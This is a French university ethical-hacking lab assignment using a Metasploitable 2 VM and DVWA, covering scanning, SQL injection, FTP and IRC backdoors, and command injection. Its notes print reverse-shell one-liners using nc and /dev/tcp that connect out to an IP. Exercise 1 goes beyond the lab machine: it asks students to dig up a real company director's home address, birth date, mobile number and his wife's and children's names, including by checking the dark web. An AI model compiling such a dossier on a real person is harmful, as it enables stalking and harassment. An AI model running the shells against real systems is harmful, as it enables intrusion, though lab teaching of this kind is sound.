## Le TP de hacking éthique


__Table des matières__

* [`PARTIE 1:  Reconnaissance`](#reco)
	* [`Exercice 1: Wallix`](#exo1)
* [`PARTIE 2:  Scanning`](#scan)
	* [`Exercice 2: Scanning nmap`](#exo2)
* [`PARTIE 3: Gaining access`](#gain)
	* [`Exercice 3: Injection sql`](#exo3)
	*  [`Exercice 4: IRC et FTP`](#exo4)
	*  [`Exercice 5: Command Execution`](#exo5)
* [`Notes`](#note)


---

- __Le plus important c'est de savoir la relation entre ce que vous allez faire ici et l'intitulé du cours__
- __Vous devez écrire un rapport sur ce TP__
    - Il faut expliquez votre démarche
        - Si vous avez fait une recherche sur google, quels sont les mots clés
        - Si vous avez choisi de suivre un lien particulier, pourquoi ? 
    - Il faut expliquez les commandes et leurs options
    - Il faut que ce soit reproductible
    - :warning: Le rapport est noté sur 4 points et la note est binaire. Soit le rapport est irréprochable et vous avez les 4 points soit il ne l'est pas et c'est 0.
    - Des l'introduction (au plus tard à la deuxième page) vous devez indiquer si vous avez réalisé tous les exercices correctement.


### IMPORTANT
---

Le prof vous donnera une adresse IP en début de séance. C'est cette adresse IP que vous devez utiliser. Aujourd'hui: `192.168.40.10` que l'on appelera dans la suite `@IP`

Si le prof n'est pas là, vous pouvez télécharger la machine virtuelle (virtualbox) depuis le réseau RT [ici - Machine Metasploitable 2](http://partage.rt-iut.re/rtcloud/ressources/pentesting/ctf/meta2.ova). Sur cette machine n'oubliez pas de vérifier la configuration réseau (accès par pont sur la bonne interface), et changer l'adresse MAC de la machine. Vous pouvez aussi réduire la RAM nécessaire, cette machine ne nécessite pas beaucoup de ram.

<a name="reco"></a>
### PARTIE 1:  Reconnaissance
---

<a name="exo1"></a>
#### Exercice 1
Vous devez obtenir les informations suivante sur la société `Wallix`:
- Nom, prénom du directeur
- Date de naissance du directeur
- Adresse postale personnelle du directeur
- Numéro de mobile du directeur
- Prénom de la femme du directeur
- Numéro de téléphone portable de la femme du directeur
- Enfant(s) et Prénom(s)

Proposer une "méthode générale" permettant de retrouver le même type d'information pour n'importe quelle autre personne / société

Par exemple (ce n'est qu'un exemple):

    - chercher le nom de la personne sur un moteur de recherche
    - fouiller linkedin
    - Regarder sur filemare si des infos sont disponibles
    - Aller sur le dark web pour voir si des informations sont à vendre
    - etc...

L'objectif de cet exercice est de récupérer des informations pertinentes sur une personnes, une société ou autre et d'écrire une procédure pour pouvoir généraliser les recherches du même type. 

<a name="scan"></a>
### PARTIE 2:  Scanning
---
<a name="exo2"></a>
#### Exercice 2

Vous devez trouver sur cette adresse `@IP`:
- L'adresse MAC
- Les services qui tournent
    - lesquels 
    - sur quel port 
    - Les versions des logiciels 
- L'OS qui tourne

L'objectif de cet exercice est d'obtenir des informations sur les services qui tournent sur la machine `@IP` et ensuite d'exploiter les failles liées à ces services. 

<a name="gain"></a>
### PARTIE 3: Gaining access
---

<a name="exo2"></a>
#### Exercice 3
---
 __Trouver des mots de passe en passant par une injection sql:__

   Vous devez obtenir une liste de login/mot de passe en utilisant des injections sql.
   
- Connectez-vous avec un navigateur sur `@IP`
- cliquez sur `dvwa`
- Les login/mot de passe sont: admin / password
- Cliquez sur `DVWA Security` et mettez la valeur à `low`
- Et cliquez sur `SQL Injection`
- A vous de jouer !!!! Trouver une liste de login mot de passe.
- :warning: Expliquez bien chaque commande... et ce qu'elles signifient.
- :warning: Rappelez les étapes de l'injection.

L'objectif de cet exercice est d'obtenir grâce à une mauvaise conception de la requête sql dans une page php une liste d'utilisateur/mot de passe.

<a name="exo4"></a>
#### Exercice 4
---
__A partir de l'adresse `@IP` fourni par le prof, vous devez acceder à la machine en passant par le serveur FTP et IRC.__
L'idée ici c'est d'obtenir une invite de commande root ou d'un autre utilisateur.

##### Exercice 4.a
- Utiliser une faille du serveur FTP.
- Vous devez expliquer la faille du serveur FTP. 
- Vous devez expliquer/trouver le code contenant la faille du serveur FTP.

##### Exercice 4.b
- Utiliser une faille du serveur IRC.
- Vous devez expliquer la faille du serveur IRC. 
- Vous devez expliquer/trouver le code contenant la faille du serveur IRC.

Dans les deux cas vous devez utiliser deux méthodes:
- Une n'utilsant pas metasploit
- Une utilisant metasploit. Si vous ne voulez pas installer metasploit, utiliser la machine virtuelle Kali Linux [ici - accès depuis le réseau RT, choisissez votre architecture](http://partage.rt-iut.re/rtcloud/Machines-Virtuelles/VM-Linux/Kali/). Le mot de passe de la machine KaliLinux pour l'utilisateur `root` est `toor`. Je vous recommande d'utiliser la machine virtuelle KaliLinux pour vos attaques, il y a beaucoup beaucoup beaucoup d'outils pré-installés très intéressants.

:warning: Pour prouver que vous avez réussi, en plus des explication de la méthode, il y a un fichier `flags.txt` dans le `home` directory de l'utilisateur `root` que vous devez récupérer

L'objectif de cet exercice est d'obtenir par les deux méthodes un accès root à la machine `@IP`. 


<a name="exo5"></a>
#### Exercice 5
---

__Un autre moyen d'obtenir un accès sur une machine c'est de profiter des faiblesses de configuration d'un système__. Ces faiblesses deviennent rapidement des failles. Par essayer, vous pouvez regarder:

- Connectez-vous avec un navigateur sur `@IP`
- cliquez sur `dvwa`
- Les login/mot de passe sont: admin / password
- Cliquez sur `DVWA Security` et mettez la valeur à `low`
- Et cliquez sur `Command Execution`
- A vous de jouer !!!! Obtenez un shell !!!!
- :warning: expliquez bien chaque commande... et ce qu'elles signifient.

Dans ce challenge, la page web présente un service de ping. Vous pouvez par exemple tapez dans le champ une addresse ip comme `9.9.9.9` et le site envoie le ping à votre place pour savoir si l'hôte désigné par l'adresse IP répond.     

C'est dans cet exercice que vous expliquez ce qu'est un `reverse shell` et l'utilisation des commande `nc -lvvp 6676` et `nc -e /bin/sh 10.0.0.1 6676`.

L'objectif de cet exercice est d'obtenir un accès en ligne de commande en tant que utilisateur `www-data`. 

---

<a name="note"></a>
### Notes (plus ou moins importantes/intéressantes/utiles)

- Essayez de bien comprendre les commandes `nc -lvvp 6676` et `nc -e /bin/sh 10.0.0.1 6676`. Si votre commande `nc` ne possède pas l'option `-e` vous pouvez utiliser `bash -i >& /dev/tcp/10.0.0.1/6676 0>&1`. Sur [pentestmonkey](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) vous avez la liste de plusieurs moyen de lancer un reverse shell.

- Pour avoir un joli `reverse shell`: 
```python
python -c "import pty; pty.spawn('/bin/bash')"
```

- __PAS OBLIGATOIRE__ Pour écrire le rapport vous pouvez utiliser un outils de production de texte qui s'appelle latex. Vous avez plein de tutoriel en ligne. J'en ai trouvé un mais je ne garantis pas sa qualité [ici](http://latex.ftp-developpez.com/cours/stage_latex.pdf). __PAS OBLIGATOIRE__
	- Vous n'avez pas besoin de télécharger latex, vous pouvez utiliser [overleaf](http://www.overleaf.com) un éditeur en ligne. Très pratique.
	- Une fois inscrit sur le site. Vous pouvez cliquer sur `Nouveau Projet` et pour ne pas partir de rien, cliquez sur `project and lab report`. Sur la troisième page, vous avez un template de l'université d'avignon que vous pouvez utiliser.... [ici](https://www.overleaf.com/latex/templates/modele-rapport-uapv/pdbgdpzsgwrt)




<!--stackedit_data:
eyJoaXN0b3J5IjpbLTI1MzAyMTAwMCwtNDQyNDM1OTA1LC0xMD
cwMDY4ODk5LC0yMDgzMTkyMzY1LDI2NzQwODcxMiwtMTE0NDk5
MDk3OSwyMDkzODU4NzU5LDY4ODU5MDM5NiwtMTAwNjk5MzA4My
wyMjk1NTgxODksMzQ4NzI1MzgzLC0xNzkxODk5NDMyLDU3NTkx
NzE5NCwtMTg5NDQyOTUyNywtNjE3NjM0MjE2LC0xNjIzNDQ2Nz
IzLDU3MzQyMzExMiwxNDM3MjIwNzEsLTk0MTY0NzQ0OV19
-->